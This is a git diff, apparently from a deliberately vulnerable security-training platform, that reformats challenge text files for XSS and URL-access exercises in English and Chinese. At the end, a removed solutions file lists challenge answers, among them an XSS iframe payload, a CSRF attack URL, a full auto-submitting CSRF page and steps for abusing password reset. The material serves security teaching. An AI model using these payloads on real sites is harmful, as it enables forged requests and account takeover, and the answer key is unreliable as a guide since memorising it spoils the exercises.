+challenge.form.instruction.comment = from the point of view of a peasant or guest
+challenge.form.getStatus = Get Server Status
+
+sign.loading = Loading
+sign.hint = Would you like a hint?
+error.occurred = An Error Occurred
\ No newline at end of file
diff --git a/src/main/resources/i18n/challenges/urlAccess/e40333fc2c40b8e0169e433366350f55c77b82878329570efa894838980de5b4.properties b/src/main/resources/i18n/challenges/urlAccess/e40333fc2c40b8e0169e433366350f55c77b82878329570efa894838980de5b4.properties
index 2ef5eb86d..004e88f23 100644
--- a/src/main/resources/i18n/challenges/urlAccess/e40333fc2c40b8e0169e433366350f55c77b82878329570efa894838980de5b4.properties
+++ b/src/main/resources/i18n/challenges/urlAccess/e40333fc2c40b8e0169e433366350f55c77b82878329570efa894838980de5b4.properties
@@ -1,6 +1,7 @@
-challenge.challengeName=Failure to Restrict URL Access Challenge 3
-challenge.description=Only highly privileged admin users of the following sub-application can retrieve the result key.
-challenge.form.adminButton=Admin Only Button
-sign.loading=Loading
-sign.hint=Would you like a hint?
-error.occurred=An Error Occurred
\ No newline at end of file
+challenge.challengeName = Failure to Restrict URL Access Challenge 3
+challenge.description = Only highly privileged admin users of the following sub-application can retrieve the result key.
+challenge.form.adminButton = Admin Only Button
+
+sign.loading = Loading
+sign.hint = Would you like a hint?
+error.occurred = An Error Occurred
\ No newline at end of file
diff --git a/src/main/resources/i18n/challenges/xss/06f81ca93f26236112f8e31f32939bd496ffe8c9f7b564bce32bd5e3a8c2f751.properties b/src/main/resources/i18n/challenges/xss/06f81ca93f26236112f8e31f32939bd496ffe8c9f7b564bce32bd5e3a8c2f751.properties
index be00ba931..732d9462f 100644
--- a/src/main/resources/i18n/challenges/xss/06f81ca93f26236112f8e31f32939bd496ffe8c9f7b564bce32bd5e3a8c2f751.properties
+++ b/src/main/resources/i18n/challenges/xss/06f81ca93f26236112f8e31f32939bd496ffe8c9f7b564bce32bd5e3a8c2f751.properties
@@ -1,6 +1,8 @@
-challenge.challengeName=Cross Site Scripting Four
-challenge.description=Demonstrate a XSS vulnerability in the following form by executing a JavaScript alert command. The developers had heard that escaping is a better way of fixing XSS issues but they were not totally clear on how to implement it.
-challenge.form.instruction=Please enter the <a>URL</a> that you wish to post to your public profile;
-challenge.form.makePost=Make Post
-sign.loading=Loading
-error.occurred=An Error Occurred
\ No newline at end of file
+challenge.challengeName = Cross Site Scripting Four
+challenge.description = Demonstrate a XSS vulnerability in the following form by executing a JavaScript alert command. The developers had heard that escaping is a better way of fixing XSS issues but they were not totally clear on how to implement it.
+challenge.form.instruction = Please enter the <a>URL</a> that you wish to post to your public profile;
+challenge.form.makePost = Make Post
+
+sign.loading = Loading
+
+error.occurred = An Error Occurred
\ No newline at end of file
diff --git a/src/main/resources/i18n/challenges/xss/06f81ca93f26236112f8e31f32939bd496ffe8c9f7b564bce32bd5e3a8c2f751_zh.properties b/src/main/resources/i18n/challenges/xss/06f81ca93f26236112f8e31f32939bd496ffe8c9f7b564bce32bd5e3a8c2f751_zh.properties
index b3937c4f5..5d89c5e90 100644
--- a/src/main/resources/i18n/challenges/xss/06f81ca93f26236112f8e31f32939bd496ffe8c9f7b564bce32bd5e3a8c2f751_zh.properties
+++ b/src/main/resources/i18n/challenges/xss/06f81ca93f26236112f8e31f32939bd496ffe8c9f7b564bce32bd5e3a8c2f751_zh.properties
@@ -1,6 +1,8 @@
-challenge.challengeName=\u8DE8\u7AD9\u811A\u672C\u653B\u51FB 4
-challenge.description=\u901A\u8FC7\u6267\u884CJavaScript\u8B66\u544A\u547D\u4EE4\u5728\u4EE5\u4E0B\u8868\u683C\u5C55\u793A\u4E00\u4E2AXSS\u6F0F\u6D1E.\u5F00\u53D1\u4EBA\u5458\u542C\u8BF4\u4FEE\u590DXSS\u95EE\u9898\u7684\u4E00\u4E2A\u66F4\u597D\u7684\u65B9\u6CD5\u662F\u9003\u8131,\u89C4\u907F,\u4F46\u662F\u4ED6\u4EEC\u5E76\u4E0D\u662F\u975E\u5E38\u6E05\u695A\u5982\u4F55\u5B9E\u73B0\u8BE5\u529E\u6CD5.
-challenge.form.instruction=\u8BF7\u8F93\u5165\u4F60\u8981\u53D1\u5E03\u5230\u4F60\u516C\u5F00\u4FE1\u606F\u7684<a>URL</a>;
-challenge.form.makePost=\u53D1\u8868
-sign.loading=\u52A0\u8F7D
-error.occurred=\u4EA7\u751F\u4E00\u4E2A\u9519\u8BEF
\ No newline at end of file
+challenge.challengeName = \u8DE8\u7AD9\u811A\u672C\u653B\u51FB 4
+challenge.description = \u901A\u8FC7\u6267\u884CJavaScript\u8B66\u544A\u547D\u4EE4\u5728\u4EE5\u4E0B\u8868\u683C\u5C55\u793A\u4E00\u4E2AXSS\u6F0F\u6D1E.\u5F00\u53D1\u4EBA\u5458\u542C\u8BF4\u4FEE\u590DXSS\u95EE\u9898\u7684\u4E00\u4E2A\u66F4\u597D\u7684\u65B9\u6CD5\u662F\u9003\u8131,\u89C4\u907F,\u4F46\u662F\u4ED6\u4EEC\u5E76\u4E0D\u662F\u975E\u5E38\u6E05\u695A\u5982\u4F55\u5B9E\u73B0\u8BE5\u529E\u6CD5.
+challenge.form.instruction = \u8BF7\u8F93\u5165\u4F60\u8981\u53D1\u5E03\u5230\u4F60\u516C\u5F00\u4FE1\u606F\u7684<a>URL</a>;
+challenge.form.makePost = \u53D1\u8868
+
+sign.loading = \u52A0\u8F7D
+
+error.occurred = \u4EA7\u751F\u4E00\u4E2A\u9519\u8BEF
\ No newline at end of file
diff --git a/src/main/resources/i18n/challenges/xss/ad2628bcc79bf10dd54ee62de148ab44b7bd028009a908ce3f1b4d019886d0e.properties b/src/main/resources/i18n/challenges/xss/ad2628bcc79bf10dd54ee62de148ab44b7bd028009a908ce3f1b4d019886d0e.properties
index 512ec7030..1092362f9 100644
--- a/src/main/resources/i18n/challenges/xss/ad2628bcc79bf10dd54ee62de148ab44b7bd028009a908ce3f1b4d019886d0e.properties
+++ b/src/main/resources/i18n/challenges/xss/ad2628bcc79bf10dd54ee62de148ab44b7bd028009a908ce3f1b4d019886d0e.properties
@@ -1,7 +1,9 @@
-challenge.challengeName=Cross Site Scripting Three
-challenge.description=Find a XSS vulnerability in the following form. It would appear that your input is been filtered!
-challenge.form.instruction=Please enter the <a>Search Term</a> that you want to look up
-challenge.form.getUser=Get this user
-sign.loading=Loading
-sign.hint=Would you like a hint?
-error.occurred=An Error Occurred
\ No newline at end of file
+challenge.challengeName = Cross Site Scripting Three
+challenge.description = Find a XSS vulnerability in the following form. It would appear that your input is been filtered!
+challenge.form.instruction = Please enter the <a>Search Term</a> that you want to look up
+challenge.form.getUser = Get this user
+
+sign.loading = Loading
+sign.hint = Would you like a hint?
+
+error.occurred = An Error Occurred
\ No newline at end of file
diff --git a/src/main/resources/i18n/challenges/xss/ad2628bcc79bf10dd54ee62de148ab44b7bd028009a908ce3f1b4d019886d0e_zh.properties b/src/main/resources/i18n/challenges/xss/ad2628bcc79bf10dd54ee62de148ab44b7bd028009a908ce3f1b4d019886d0e_zh.properties
index 455fd2368..035e50c95 100644
--- a/src/main/resources/i18n/challenges/xss/ad2628bcc79bf10dd54ee62de148ab44b7bd028009a908ce3f1b4d019886d0e_zh.properties
+++ b/src/main/resources/i18n/challenges/xss/ad2628bcc79bf10dd54ee62de148ab44b7bd028009a908ce3f1b4d019886d0e_zh.properties
@@ -1,7 +1,9 @@
-challenge.challengeName=\u8DE8\u7AD9\u811A\u672C\u653B\u51FB 3
-challenge.description=\u5728\u4EE5\u4E0B\u8868\u683C\u4E2D\u627E\u51FA\u4E00\u4E2AXSS\u6F0F\u6D1E.\u60A8\u5C06\u6709\u53EF\u80FD\u770B\u5230,\u60A8\u6240\u8F93\u5165\u7684\u5DF2\u88AB\u8FC7\u6EE4!
-challenge.form.instruction=\u8BF7\u8F93\u5165\u60A8\u60F3\u8981\u67E5\u8BE2<a>\u641C\u7D22\u8BCD</a>
-challenge.form.getUser=\u83B7\u53D6\u8BE5\u7528\u6237
-sign.loading=\u52A0\u8F7D\u4E2D
-sign.hint=\u4F60\u9700\u8981\u63D0\u793A\u5417?
-error.occurred=\u6709\u4E00\u4E2A\u9519\u8BEF\u4EA7\u751F
\ No newline at end of file
+challenge.challengeName = \u8DE8\u7AD9\u811A\u672C\u653B\u51FB 3
+challenge.description = \u5728\u4EE5\u4E0B\u8868\u683C\u4E2D\u627E\u51FA\u4E00\u4E2AXSS\u6F0F\u6D1E.\u60A8\u5C06\u6709\u53EF\u80FD\u770B\u5230,\u60A8\u6240\u8F93\u5165\u7684\u5DF2\u88AB\u8FC7\u6EE4!
+challenge.form.instruction = \u8BF7\u8F93\u5165\u60A8\u60F3\u8981\u67E5\u8BE2<a>\u641C\u7D22\u8BCD</a>
+challenge.form.getUser = \u83B7\u53D6\u8BE5\u7528\u6237
+
+sign.loading = \u52A0\u8F7D\u4E2D
+sign.hint = \u4F60\u9700\u8981\u63D0\u793A\u5417?
+
+error.occurred = \u6709\u4E00\u4E2A\u9519\u8BEF\u4EA7\u751F
\ No newline at end of file
diff --git a/src/main/resources/i18n/challenges/xss/d330dea1acf21886b685184ee222ea8e0a60589c3940afd6ebf433469e997caf.properties b/src/main/resources/i18n/challenges/xss/d330dea1acf21886b685184ee222ea8e0a60589c3940afd6ebf433469e997caf.properties
index 3f639bbc2..8476bf842 100644
--- a/src/main/resources/i18n/challenges/xss/d330dea1acf21886b685184ee222ea8e0a60589c3940afd6ebf433469e997caf.properties
+++ b/src/main/resources/i18n/challenges/xss/d330dea1acf21886b685184ee222ea8e0a60589c3940afd6ebf433469e997caf.properties
@@ -1,6 +1,8 @@
-challenge.challengeName=Cross Site Scripting Six
-challenge.description=Demonstrate a XSS vulnerability in the following form by executing a JavaScript alert command. The developers of this application wanted to demonstrate how HTTP links can be embedded in HTML and learned a bit about sanitizing their input for XSS attacks! Have a look by putting in your own HTTP link. The developers are only allowing HTTP URLs!
-challenge.form.instruction=Please enter the <a>URL</a> that you wish to post to your public profile;
-challenge.form.makePost=Make Post
-sign.loading=Loading
-error.occurred=An Error Occurred
\ No newline at end of file
+challenge.challengeName = Cross Site Scripting Six
+challenge.description = Demonstrate a XSS vulnerability in the following form by executing a JavaScript alert command. The developers of this application wanted to demonstrate how HTTP links can be embedded in HTML and learned a bit about sanitizing their input for XSS attacks! Have a look by putting in your own HTTP link. The developers are only allowing HTTP URLs!
+challenge.form.instruction = Please enter the <a>URL</a> that you wish to post to your public profile;
+challenge.form.makePost = Make Post
+
+sign.loading = Loading
+
+error.occurred = An Error Occurred
\ No newline at end of file
diff --git a/src/main/resources/i18n/challenges/xss/d330dea1acf21886b685184ee222ea8e0a60589c3940afd6ebf433469e997caf_zh.properties b/src/main/resources/i18n/challenges/xss/d330dea1acf21886b685184ee222ea8e0a60589c3940afd6ebf433469e997caf_zh.properties
index c677b3004..55a732814 100644
--- a/src/main/resources/i18n/challenges/xss/d330dea1acf21886b685184ee222ea8e0a60589c3940afd6ebf433469e997caf_zh.properties
+++ b/src/main/resources/i18n/challenges/xss/d330dea1acf21886b685184ee222ea8e0a60589c3940afd6ebf433469e997caf_zh.properties
@@ -1,8 +1,10 @@
-challenge.challengeName=\u8DE8\u7AD9\u811A\u672C\u653B\u51FB 6
-challenge.description=\u901A\u8FC7\u6267\u884CJavaScript\u8B66\u544A\u547D\u4EE4\u5728\u4EE5\u4E0B\u8868\u683C\u5C55\u793A\u4E00\u4E2AXSS\u6F0F\u6D1E.\u8BE5\u5E94\u7528\u7A0B\u5E8F\u7684\u5F00\u53D1\u4EBA\u5458\u60F3\u8981\u5C55\u793AHTTP\u94FE\u63A5\u662F\u5982\u4F55\u88AB\u5D4C\u5165\u5230HTML,\u5E76\u4E86\u89E3\u4E00\u4E9B\u5173\u4E8E\u4E3AXSS\u653B\u51FB\u505A\u7684\u8F93\u5165\u5904\u7406.\u8BD5\u8BD5\u8F93\u5165\u4F60\u81EA\u5DF1\u7684HTTP\u94FE\u63A5,\u53EA\u5141\u8BB8HTTP URLs!
-challenge.form.instruction=\u8BF7\u8F93\u5165\u4F60\u8981\u53D1\u5E03\u5230\u4F60\u516C\u5F00\u4FE1\u606F\u7684<a>URL</a>;
-challenge.form.makePost=\u53D1\u8868
-sign.loading=\u52A0\u8F7D
-error.occurred=\u4EA7\u751F\u4E00\u4E2A\u9519\u8BEF
+challenge.challengeName = \u8DE8\u7AD9\u811A\u672C\u653B\u51FB 6
+challenge.description = \u901A\u8FC7\u6267\u884CJavaScript\u8B66\u544A\u547D\u4EE4\u5728\u4EE5\u4E0B\u8868\u683C\u5C55\u793A\u4E00\u4E2AXSS\u6F0F\u6D1E.\u8BE5\u5E94\u7528\u7A0B\u5E8F\u7684\u5F00\u53D1\u4EBA\u5458\u60F3\u8981\u5C55\u793AHTTP\u94FE\u63A5\u662F\u5982\u4F55\u88AB\u5D4C\u5165\u5230HTML,\u5E76\u4E86\u89E3\u4E00\u4E9B\u5173\u4E8E\u4E3AXSS\u653B\u51FB\u505A\u7684\u8F93\u5165\u5904\u7406.\u8BD5\u8BD5\u8F93\u5165\u4F60\u81EA\u5DF1\u7684HTTP\u94FE\u63A5,\u53EA\u5141\u8BB8HTTP URLs!
+challenge.form.instruction = \u8BF7\u8F93\u5165\u4F60\u8981\u53D1\u5E03\u5230\u4F60\u516C\u5F00\u4FE1\u606F\u7684<a>URL</a>;
+challenge.form.makePost = \u53D1\u8868
+
+sign.loading = \u52A0\u8F7D
+
+error.occurred = \u4EA7\u751F\u4E00\u4E2A\u9519\u8BEF
 
 
diff --git a/src/main/resources/i18n/challenges/xss/d72ca2694422af2e6b3c5d90e4c11e7b4575a7bc12ee6d0a384ac2469449e8fa.properties b/src/main/resources/i18n/challenges/xss/d72ca2694422af2e6b3c5d90e4c11e7b4575a7bc12ee6d0a384ac2469449e8fa.properties
index b1ad6bcb8..358abc4eb 100644
--- a/src/main/resources/i18n/challenges/xss/d72ca2694422af2e6b3c5d90e4c11e7b4575a7bc12ee6d0a384ac2469449e8fa.properties
+++ b/src/main/resources/i18n/challenges/xss/d72ca2694422af2e6b3c5d90e4c11e7b4575a7bc12ee6d0a384ac2469449e8fa.properties
@@ -1,7 +1,9 @@
-challenge.challengeName=Cross Site Scripting One
-challenge.description=Find a XSS vulnerability in the following form. It would appear that your input is been filtered!
-challenge.form.instruction=Please enter the <a>Search Term</a> that you want to look up
-challenge.form.getUser=Get this user
-sign.loading=Loading
-sign.hint=Would you like a hint?
-error.occurred=An Error Occurred
\ No newline at end of file
+challenge.challengeName = Cross Site Scripting One
+challenge.description = Find a XSS vulnerability in the following form. It would appear that your input is been filtered!
+challenge.form.instruction = Please enter the <a>Search Term</a> that you want to look up
+challenge.form.getUser = Get this user
+
+sign.loading = Loading
+sign.hint = Would you like a hint?
+
+error.occurred = An Error Occurred
\ No newline at end of file
diff --git a/src/main/resources/i18n/challenges/xss/d72ca2694422af2e6b3c5d90e4c11e7b4575a7bc12ee6d0a384ac2469449e8fa_zh.properties b/src/main/resources/i18n/challenges/xss/d72ca2694422af2e6b3c5d90e4c11e7b4575a7bc12ee6d0a384ac2469449e8fa_zh.properties
index 5a199b220..81964bbd8 100644
--- a/src/main/resources/i18n/challenges/xss/d72ca2694422af2e6b3c5d90e4c11e7b4575a7bc12ee6d0a384ac2469449e8fa_zh.properties
+++ b/src/main/resources/i18n/challenges/xss/d72ca2694422af2e6b3c5d90e4c11e7b4575a7bc12ee6d0a384ac2469449e8fa_zh.properties
@@ -1,7 +1,10 @@
-challenge.challengeName=\u8DE8\u7AD9\u811A\u672C\u653B\u51FB 1
-challenge.description=\u5728\u4EE5\u4E0B\u8868\u683C\u4E2D\u627E\u51FA\u4E00\u4E2AXSS\u6F0F\u6D1E.\u60A8\u5C06\u6709\u53EF\u80FD\u770B\u5230,\u60A8\u6240\u8F93\u5165\u7684\u5DF2\u88AB\u8FC7\u6EE4!
-challenge.form.instruction=\u8BF7\u8F93\u5165\u60A8\u60F3\u8981\u67E5\u8BE2<a>\u641C\u7D22\u8BCD</a>
-challenge.form.getUser=\u83B7\u53D6\u8BE5\u7528\u6237
-sign.loading=\u52A0\u8F7D
-sign.hint=\u4F60\u9700\u8981\u63D0\u793A\u5417?
-error.occurred=\u6709\u4E00\u4E2A\u9519\u8BEF\u4EA7\u751F
\ No newline at end of file
+challenge.challengeName = \u8DE8\u7AD9\u811A\u672C\u653B\u51FB 1
+challenge.description = \u5728\u4EE5\u4E0B\u8868\u683C\u4E2D\u627E\u51FA\u4E00\u4E2AXSS\u6F0F\u6D1E.\u60A8\u5C06\u6709\u53EF\u80FD\u770B\u5230,\u60A8\u6240\u8F93\u5165\u7684\u5DF2\u88AB\u8FC7\u6EE4!
+
+challenge.form.instruction = \u8BF7\u8F93\u5165\u60A8\u60F3\u8981\u67E5\u8BE2<a>\u641C\u7D22\u8BCD</a>
+challenge.form.getUser = \u83B7\u53D6\u8BE5\u7528\u6237
+
+sign.loading = \u52A0\u8F7D
+sign.hint = \u4F60\u9700\u8981\u63D0\u793A\u5417?
+
+error.occurred = \u6709\u4E00\u4E2A\u9519\u8BEF\u4EA7\u751F
\ No newline at end of file
diff --git a/src/main/resources/i18n/challenges/xss/f37d45f597832cdc6e91358dca3f53039d4489c94df2ee280d6203b389dd5671.properties b/src/main/resources/i18n/challenges/xss/f37d45f597832cdc6e91358dca3f53039d4489c94df2ee280d6203b389dd5671.properties
index 44ba70f4a..497671a26 100644
--- a/src/main/resources/i18n/challenges/xss/f37d45f597832cdc6e91358dca3f53039d4489c94df2ee280d6203b389dd5671.properties
+++ b/src/main/resources/i18n/challenges/xss/f37d45f597832cdc6e91358dca3f53039d4489c94df2ee280d6203b389dd5671.properties
@@ -1,7 +1,9 @@
-challenge.challengeName=Cross Site Scripting Five
-challenge.description=Demonstrate a XSS vulnerability in the following form by executing a JavaScript alert command. The developers of this sub application wanted to demonstrate how HTTP links can be embedded in HTML. Have a look by putting in your own HTTP link. The Developers are white listing input so only HTTP URLs are allowed!
-challenge.form.instruction=Please enter the <a>URL</a> that you wish to post to your public profile
-challenge.form.makePost=Make Post
-sign.loading=Loading
-sign.hint=Would you like a hint?
-error.occurred=An Error Occurred
\ No newline at end of file
+challenge.challengeName = Cross Site Scripting Five
+challenge.description = Demonstrate a XSS vulnerability in the following form by executing a JavaScript alert command. The developers of this sub application wanted to demonstrate how HTTP links can be embedded in HTML. Have a look by putting in your own HTTP link. The Developers are white listing input so only HTTP URLs are allowed!
+challenge.form.instruction = Please enter the <a>URL</a> that you wish to post to your public profile
+challenge.form.makePost = Make Post
+
+sign.loading = Loading
+sign.hint = Would you like a hint?
+
+error.occurred = An Error Occurred
\ No newline at end of file
diff --git a/src/main/resources/i18n/challenges/xss/f37d45f597832cdc6e91358dca3f53039d4489c94df2ee280d6203b389dd5671_zh.properties b/src/main/resources/i18n/challenges/xss/f37d45f597832cdc6e91358dca3f53039d4489c94df2ee280d6203b389dd5671_zh.properties
index 19b8556fe..7f4e7653b 100644
--- a/src/main/resources/i18n/challenges/xss/f37d45f597832cdc6e91358dca3f53039d4489c94df2ee280d6203b389dd5671_zh.properties
+++ b/src/main/resources/i18n/challenges/xss/f37d45f597832cdc6e91358dca3f53039d4489c94df2ee280d6203b389dd5671_zh.properties
@@ -1,7 +1,9 @@
-challenge.challengeName=\u8DE8\u7AD9\u811A\u672C\u653B\u51FB 5
-challenge.description=\u901A\u8FC7\u6267\u884CJavaScript\u8B66\u544A\u547D\u4EE4\u5728\u4EE5\u4E0B\u8868\u683C\u5C55\u793A\u4E00\u4E2AXSS\u6F0F\u6D1E.\u8BE5\u5E94\u7528\u7A0B\u5E8F\u7684\u5F00\u53D1\u4EBA\u5458\u60F3\u8981\u5C55\u793AHTTP\u94FE\u63A5\u662F\u5982\u4F55\u88AB\u5D4C\u5165\u5230HTML,\u5E76\u4E86\u89E3\u4E00\u4E9B\u5173\u4E8E\u4E3AXSS\u653B\u51FB\u505A\u7684\u8F93\u5165\u5904\u7406.\u8BD5\u8BD5\u8F93\u5165\u4F60\u81EA\u5DF1\u7684HTTP\u94FE\u63A5,\u53EA\u5141\u8BB8HTTP URLs!
-challenge.form.instruction=\u8BF7\u8F93\u5165\u4F60\u8981\u53D1\u5E03\u5230\u4F60\u516C\u5F00\u4FE1\u606F\u7684<a>URL</a>;
-challenge.form.makePost=\u53D1\u8868
-sign.loading=\u52A0\u8F7D
-sign.hint=\u4F60\u9700\u8981\u63D0\u793A\u5417?
-error.occurred=\u4EA7\u751F\u4E00\u4E2A\u9519\u8BEF
\ No newline at end of file
+challenge.challengeName = \u8DE8\u7AD9\u811A\u672C\u653B\u51FB 5
+challenge.description = \u901A\u8FC7\u6267\u884CJavaScript\u8B66\u544A\u547D\u4EE4\u5728\u4EE5\u4E0B\u8868\u683C\u5C55\u793A\u4E00\u4E2AXSS\u6F0F\u6D1E.\u8BE5\u5E94\u7528\u7A0B\u5E8F\u7684\u5F00\u53D1\u4EBA\u5458\u60F3\u8981\u5C55\u793AHTTP\u94FE\u63A5\u662F\u5982\u4F55\u88AB\u5D4C\u5165\u5230HTML,\u5E76\u4E86\u89E3\u4E00\u4E9B\u5173\u4E8E\u4E3AXSS\u653B\u51FB\u505A\u7684\u8F93\u5165\u5904\u7406.\u8BD5\u8BD5\u8F93\u5165\u4F60\u81EA\u5DF1\u7684HTTP\u94FE\u63A5,\u53EA\u5141\u8BB8HTTP URLs!
+challenge.form.instruction = \u8BF7\u8F93\u5165\u4F60\u8981\u53D1\u5E03\u5230\u4F60\u516C\u5F00\u4FE1\u606F\u7684<a>URL</a>;
+challenge.form.makePost = \u53D1\u8868
+
+sign.loading = \u52A0\u8F7D
+sign.hint = \u4F60\u9700\u8981\u63D0\u793A\u5417?
+
+error.occurred = \u4EA7\u751F\u4E00\u4E2A\u9519\u8BEF
\ No newline at end of file
diff --git a/src/main/resources/i18n/challenges/xss/t27357536888e807ff0f0eff751d6034bafe48954575c3a6563cb47a85b1e888.properties b/src/main/resources/i18n/challenges/xss/t27357536888e807ff0f0eff751d6034bafe48954575c3a6563cb47a85b1e888.properties
index 06368f86f..47c4ef368 100644
--- a/src/main/resources/i18n/challenges/xss/t27357536888e807ff0f0eff751d6034bafe48954575c3a6563cb47a85b1e888.properties
+++ b/src/main/resources/i18n/challenges/xss/t27357536888e807ff0f0eff751d6034bafe48954575c3a6563cb47a85b1e888.properties
@@ -1,7 +1,9 @@
-challenge.challengeName=Cross Site Scripting Two
-challenge.description=Find a XSS vulnerability in the following form. It would appear that your input is been filtered!
-challenge.form.instruction=Please enter the <a>Search Term</a> that you want to look up
-challenge.form.getUser=Get this user
-sign.loading=Loading
-sign.hint=Would you like a hint?
-error.occurred=An Error Occurred
\ No newline at end of file
+challenge.challengeName = Cross Site Scripting Two
+challenge.description = Find a XSS vulnerability in the following form. It would appear that your input is been filtered!
+challenge.form.instruction = Please enter the <a>Search Term</a> that you want to look up
+challenge.form.getUser = Get this user
+
+sign.loading = Loading
+sign.hint = Would you like a hint?
+
+error.occurred = An Error Occurred
\ No newline at end of file
diff --git a/src/main/resources/i18n/challenges/xss/t27357536888e807ff0f0eff751d6034bafe48954575c3a6563cb47a85b1e888_.properties b/src/main/resources/i18n/challenges/xss/t27357536888e807ff0f0eff751d6034bafe48954575c3a6563cb47a85b1e888_.properties
index 3e03090c5..3b85578fe 100644
--- a/src/main/resources/i18n/challenges/xss/t27357536888e807ff0f0eff751d6034bafe48954575c3a6563cb47a85b1e888_.properties
+++ b/src/main/resources/i18n/challenges/xss/t27357536888e807ff0f0eff751d6034bafe48954575c3a6563cb47a85b1e888_.properties
@@ -1,7 +1,9 @@
-challenge.challengeName=\u8DE8\u7AD9\u811A\u672C\u653B\u51FB 2
-challenge.description=\u5728\u4EE5\u4E0B\u8868\u683C\u4E2D\u627E\u51FA\u4E00\u4E2AXSS\u6F0F\u6D1E.\u60A8\u5C06\u6709\u53EF\u80FD\u770B\u5230,\u60A8\u6240\u8F93\u5165\u7684\u5DF2\u88AB\u8FC7\u6EE4!
-challenge.form.instruction=\u8BF7\u8F93\u5165\u60A8\u60F3\u8981\u67E5\u8BE2<a>\u641C\u7D22\u8BCD</a>
-challenge.form.getUser=\u83B7\u53D6\u8BE5\u7528\u6237
-sign.loading=\u52A0\u8F7D
-sign.hint=\u4F60\u9700\u8981\u63D0\u793A\u5417?
-error.occurred=\u6709\u4E00\u4E2A\u9519\u8BEF\u4EA7\u751F
\ No newline at end of file
+challenge.challengeName = \u8DE8\u7AD9\u811A\u672C\u653B\u51FB 2
+challenge.description = \u5728\u4EE5\u4E0B\u8868\u683C\u4E2D\u627E\u51FA\u4E00\u4E2AXSS\u6F0F\u6D1E.\u60A8\u5C06\u6709\u53EF\u80FD\u770B\u5230,\u60A8\u6240\u8F93\u5165\u7684\u5DF2\u88AB\u8FC7\u6EE4!
+challenge.form.instruction = \u8BF7\u8F93\u5165\u60A8\u60F3\u8981\u67E5\u8BE2<a>\u641C\u7D22\u8BCD</a>
+challenge.form.getUser = \u83B7\u53D6\u8BE5\u7528\u6237
+
+sign.loading = \u52A0\u8F7D
+sign.hint = \u4F60\u9700\u8981\u63D0\u793A\u5417?
+
+error.occurred = \u6709\u4E00\u4E2A\u9519\u8BEF\u4EA7\u751F
\ No newline at end of file
diff --git a/src/main/resources/i18n/challenges/xss/t27357536888e807ff0f0eff751d6034bafe48954575c3a6563cb47a85b1e888_zh.properties b/src/main/resources/i18n/challenges/xss/t27357536888e807ff0f0eff751d6034bafe48954575c3a6563cb47a85b1e888_zh.properties
index 3e03090c5..3b85578fe 100644
--- a/src/main/resources/i18n/challenges/xss/t27357536888e807ff0f0eff751d6034bafe48954575c3a6563cb47a85b1e888_zh.properties
+++ b/src/main/resources/i18n/challenges/xss/t27357536888e807ff0f0eff751d6034bafe48954575c3a6563cb47a85b1e888_zh.properties
@@ -1,7 +1,9 @@
-challenge.challengeName=\u8DE8\u7AD9\u811A\u672C\u653B\u51FB 2
-challenge.description=\u5728\u4EE5\u4E0B\u8868\u683C\u4E2D\u627E\u51FA\u4E00\u4E2AXSS\u6F0F\u6D1E.\u60A8\u5C06\u6709\u53EF\u80FD\u770B\u5230,\u60A8\u6240\u8F93\u5165\u7684\u5DF2\u88AB\u8FC7\u6EE4!
-challenge.form.instruction=\u8BF7\u8F93\u5165\u60A8\u60F3\u8981\u67E5\u8BE2<a>\u641C\u7D22\u8BCD</a>
-challenge.form.getUser=\u83B7\u53D6\u8BE5\u7528\u6237
-sign.loading=\u52A0\u8F7D
-sign.hint=\u4F60\u9700\u8981\u63D0\u793A\u5417?
-error.occurred=\u6709\u4E00\u4E2A\u9519\u8BEF\u4EA7\u751F
\ No newline at end of file
+challenge.challengeName = \u8DE8\u7AD9\u811A\u672C\u653B\u51FB 2
+challenge.description = \u5728\u4EE5\u4E0B\u8868\u683C\u4E2D\u627E\u51FA\u4E00\u4E2AXSS\u6F0F\u6D1E.\u60A8\u5C06\u6709\u53EF\u80FD\u770B\u5230,\u60A8\u6240\u8F93\u5165\u7684\u5DF2\u88AB\u8FC7\u6EE4!
+challenge.form.instruction = \u8BF7\u8F93\u5165\u60A8\u60F3\u8981\u67E5\u8BE2<a>\u641C\u7D22\u8BCD</a>
+challenge.form.getUser = \u83B7\u53D6\u8BE5\u7528\u6237
+
+sign.loading = \u52A0\u8F7D
+sign.hint = \u4F60\u9700\u8981\u63D0\u793A\u5417?
+
+error.occurred = \u6709\u4E00\u4E2A\u9519\u8BEF\u4EA7\u751F
\ No newline at end of file
diff --git a/src/main/resources/i18n/cheatsheets/solutions.properties b/src/main/resources/i18n/cheatsheets/solutions.properties
index bea364ba1..ab01bf198 100644
--- a/src/main/resources/i18n/cheatsheets/solutions.properties
+++ b/src/main/resources/i18n/cheatsheets/solutions.properties
@@ -1,78 +1,78 @@
-0dbea4cb5811fff0527184f99bd5034ca9286f11.solution=Stop the request with a proxy and change the &quot;username&quot; parameter to be equal to &quot;admin&quot;
-453d22238401e0bf6f1ff5d45996407e98e45b07.solution=To complete the lesson, the attack string is the following:<br/>&quot;https://hostname:port/root/grantComplete/csrfLesson?userId=tempId&quot;
-cd7f70faed73d2457219b951e714ebe5775515d8.solution=Input is being filtered. To complete this challenge, enter the following attack string: <br/>&lt;iframe src=&#39;#&#39; onload=&#39;alert(&quot;XSS&quot;)&#39;&gt;&lt;/iframe&gt
-2dc909fd89c2b03059b1512e7b54ce5d1aaa4bb4.solution=The user Ids in this challenge follow a sequence 1,3,5 etc. The Hidden Users ID is 11
-94cd2de560d89ef59fc450ecc647ff4d4a55c15d.solution=To complete this challenge, you must force another user to submit a post request. The easiest way to achieve this is to force the user to visit a custom webpage that submits the post request. This means the webpage needs to be accessible. It can be accessed via a HTTP server, a public Dropbox link, a shared file area. The following is an example webpage that would complete the challenge<br/><br/>&lt;html&gt;<br/>&lt;body&gt;<br/>&lt;form id=&quot;completeChallenge2&quot; action=&quot;https://hostname:port/user/csrfchallengetwo/plusplus&quot; method=&quot;POST&quot; &gt;<br/>&lt;input type=&quot;hidden&quot; name=&quot;userId&quot; value=&quot;exampleId&quot; /&gt;<br/>&lt;input type=&quot;submit&quot;/&gt;<br/>&lt;/form&gt;<br/>&lt;script&gt;<br/>document.forms[&quot;completeChallenge2&quot;].submit();<br/>&lt;/script&gt;<br/>&lt;/body&gt;<br/>&lt;/html&gt;<br/><br/>The class form function should be used to create an iframe that forces the user to visit this attack page.
-b70a84f159876bb9885b6e0087d22f0a52abbfcf.solution=Use the login function with usernames like admin, administrator, root, etc to find administrator email accounts. Use the forgotten password functionality to change the password for the email address recovered. Inspect the response of the password reset request to see what the password was reset to. Use this password to login!
